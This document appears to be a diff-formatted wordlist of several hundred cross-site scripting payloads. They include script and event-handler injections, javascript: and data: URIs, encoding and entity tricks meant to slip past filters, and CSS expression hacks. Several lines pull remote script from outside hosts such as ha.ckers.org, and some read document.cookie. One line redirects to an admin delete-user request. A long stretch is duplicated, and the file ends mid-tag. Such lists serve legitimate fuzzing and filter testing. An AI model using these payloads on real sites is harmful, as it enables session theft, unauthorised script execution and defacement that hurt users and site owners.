+exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE 
TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<BASE HREF="javascript:alert('XSS');//"> + <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT 
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> + <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} +<img/src=`%00` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? 
+<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN 
+<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe/%00/ src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe 
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. 
\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +‘; alert(1); +‘)alert(1);// +<ScRiPt>alert(1)</sCriPt> +<IMG SRC=jAVasCrIPt:alert(‘XSS’)> +<IMG SRC=”javascript:alert(‘XSS’);”> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert(‘XSS’)> +<img src=xss 
onerror=alert(1)> +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} +<img/src=`%00` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" 
onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe/%00/ src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a 
href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a 
+<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> + <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 
41)</SCRIPT> +‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=”jav ascript:alert(‘XSS’);”> +<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”> +<<SCRIPT>alert(“XSS”);//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +“><s”%2b”cript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND=”javascript:alert(‘XSS’)”> +<BODY ONLOAD=alert(‘XSS’)> +<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> +<IMG SRC=”javascript:alert(‘XSS’)” +<iframe src=http://ha.ckers.org/scriptlet.html < +javascript:alert("hellox worldss") +<img src="javascript:alert('XSS');"> +<img src=javascript:alert(&quot;XSS&quot;)> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv 
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search +<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 +<script>alert("XSS");</script>&search=1 +0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search +<h1><font color=blue>hellox worldss</h1> +<BODY ONLOAD=alert('hellox worldss')> +<input onfocus=write(XSS) autofocus> +<input onblur=write(XSS) autofocus><input autofocus> +<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form><button formaction="javascript:alert(XSS)">lol +<!--<img src="--><img src=x onerror=alert(XSS)//"> +<![><img src="]><img src=x 
onerror=alert(XSS)//"> +<style><img src="</style><img src=x onerror=alert(XSS)//"> +<? foo="><script>alert(1)</script>"> +<! foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<? foo="><x foo='?><script>alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> +<% foo><x foo="%><script>alert(123)</script>"> +<div style="font-family:'foo&#10;;color:red;';">LOL +LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> +<script>({0:#0=alert/#0#/#0#(0)})</script> +<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> +&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; +\\";alert('XSS');// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt; +&lt;INPUT 